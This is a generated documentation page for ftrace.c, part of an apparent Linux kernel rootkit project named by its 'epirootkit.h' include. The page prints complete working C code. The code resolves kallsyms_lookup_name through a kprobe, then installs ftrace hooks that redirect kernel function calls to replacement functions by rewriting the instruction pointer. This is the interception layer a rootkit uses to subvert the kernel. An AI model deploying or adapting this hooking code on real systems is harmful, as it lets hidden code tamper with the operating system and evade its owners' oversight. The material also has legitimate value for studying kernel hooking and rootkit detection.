ftrace.c File Reference

#include "ftrace.h"
#include "epirootkit.h"

Include dependency graph for ftrace.c:

Go to the source code of this file.

Functions
static void notrace	fh_ftrace_thunk (unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct ftrace_regs *regs)
	ftrace callback that redirects execution to the hook function.
int	fh_install_hook (struct ftrace_hook *hook)
	Install an individual ftrace hook.
void	fh_remove_hook (struct ftrace_hook *hook)
	Remove an individual ftrace hook.
int	fh_install_hooks (struct ftrace_hook *hooks, size_t count)
	Install multiple ftrace hooks.
void	fh_remove_hooks (struct ftrace_hook *hooks, size_t count)
	Remove multiple ftrace hooks.

Variables
unsigned long(*)(const char *)	fh_init_kallsyms_lookup (void)
	Retrieve the address of kallsyms_lookup_name via kprobe.

Function Documentation

fh_ftrace_thunk()

static void notrace fh_ftrace_thunk ( unsigned long  ip, unsigned long  parent_ip, struct ftrace_ops *  ops, struct ftrace_regs *  regs  )

static

ftrace callback that redirects execution to the hook function.

Parameters

ip	The instruction pointer.
parent_ip	The parent instruction pointer.
ops	Pointer to ftrace_ops structure.
regs	Pointer to ftrace_regs structure.

Definition at line 44 of file ftrace.c.

                                                              {
    struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
    if (!within_module(parent_ip, THIS_MODULE))
        ((struct pt_regs *)regs)->ip = (unsigned long)hook->function;
}

fh_install_hook()

int fh_install_hook

(

struct ftrace_hook *

hook

)

Install an individual ftrace hook.

Parameters

hook	Pointer to an ftrace_hook structure.

Returns

0 on success, or a negative error code on failure.

Definition at line 58 of file ftrace.c.

                                              {
    int err;
    unsigned long (*kallsyms_lookup)(const char *) = fh_init_kallsyms_lookup();
 
    if (!kallsyms_lookup) {
        ERR_MSG("ftrace: unable to get kallsyms_lookup_name pointer\n");
        return -ENOENT;
    }
 
    hook->address = kallsyms_lookup(hook->name);
    if (!hook->address) {
        ERR_MSG("ftrace: unresolved symbol\n");
        return -ENOENT;
    }
 
    *((unsigned long *)hook->original) = hook->address;
 
    hook->ops.func = fh_ftrace_thunk;
    hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS | FTRACE_OPS_FL_RECURSION | FTRACE_OPS_FL_IPMODIFY;
 
    err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
    if (err) {
        ERR_MSG("ftrace: ftrace_set_filter_ip() failed.\n");
        return err;
    }
 
    err = register_ftrace_function(&hook->ops);
    if (err) {
        ERR_MSG("ftrace: register_ftrace_function() failed.\n");
        return err;
    }
    return 0;
}

fh_install_hooks()

int fh_install_hooks	(	struct ftrace_hook *	hooks,
		size_t	count
	)

Install multiple ftrace hooks.

Parameters

hooks	Pointer to an array of ftrace_hook structures.
count	Number of hooks in the array.

Returns

0 on success, or a negative error code on failure.

Definition at line 116 of file ftrace.c.

                                                              {
    int err;
    size_t i;
    for (i = 0; i < count; i++) {
        err = fh_install_hook(&hooks[i]);
        if (err) {
            while (i--)
                fh_remove_hook(&hooks[i]);
            return err;
        }
    }
    return 0;
}

fh_remove_hook()

void fh_remove_hook

(

struct ftrace_hook *

hook

)

Remove an individual ftrace hook.

Parameters

hook	Pointer to an ftrace_hook structure.

Definition at line 97 of file ftrace.c.

                                              {
    int err;
 
    err = unregister_ftrace_function(&hook->ops);
    if (err)
        ERR_MSG("ftrace: unregister_ftrace_function() failed.\n");
 
    err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
    if (err)
        ERR_MSG("ftrace: ftrace_set_filter_ip() failed. \n");
}

fh_remove_hooks()

void fh_remove_hooks	(	struct ftrace_hook *	hooks,
		size_t	count
	)

Remove multiple ftrace hooks.

Parameters

hooks	Pointer to an array of ftrace_hook structures.
count	Number of hooks in the array.

Definition at line 136 of file ftrace.c.

                                                              {
    size_t i;
    for (i = 0; i < count; i++)
        fh_remove_hook(&hooks[i]);
}

Variable Documentation

fh_init_kallsyms_lookup

unsigned long(*)(const char *) fh_init_kallsyms_lookup(void)

(

void

)

Retrieve the address of kallsyms_lookup_name via kprobe.

This function registers a temporary kprobe on "kallsyms_lookup_name", caches the pointer, and returns it.

Returns

Pointer to kallsyms_lookup_name, or NULL on failure.

Definition at line 13 of file ftrace.c.

                                                             {
    typedef unsigned long (*kallsyms_lookup_name_t)(const char *);
    static kallsyms_lookup_name_t fh_kallsyms_lookup_ptr = NULL;
    int ret;
    struct kprobe kp = {
        .symbol_name = "kallsyms_lookup_name",
    };
 
    if (fh_kallsyms_lookup_ptr)
        return fh_kallsyms_lookup_ptr;
 
    ret = register_kprobe(&kp);
    if (ret < 0) {
        ERR_MSG("fh_init_kallsyms_lookup: register_kprobe failed\n");
        return NULL;
    }
 
    fh_kallsyms_lookup_ptr = (kallsyms_lookup_name_t)kp.addr;
    unregister_kprobe(&kp);
 
    return fh_kallsyms_lookup_ptr;
}